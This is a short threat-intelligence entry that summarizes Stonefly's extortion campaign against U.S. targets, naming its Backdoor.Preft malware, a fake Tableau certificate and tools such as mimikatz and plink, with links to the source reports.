Stonefly: Extortion Attacks Continue Against U.S. Targets

216.73.216.6

Stonefly: Extortion Attacks Continue Against U.S. Targets

· Published 03/10/2024 17:08 · Modified 03/10/2024 17:23

Essential information

Published: 03/10/2024 17:08
Modified: 03/10/2024 17:23
Tags: 2024-10-03 megatools mimikatz plink snap2html
Related entities: 50 observables, 10 techniques (mitre), 1 others

Description

In several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool is exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently documented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be unique to this campaign.

External references

https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion
https://otx.alienvault.com/pulse/66fecf7a10bc3e96bf7e26ac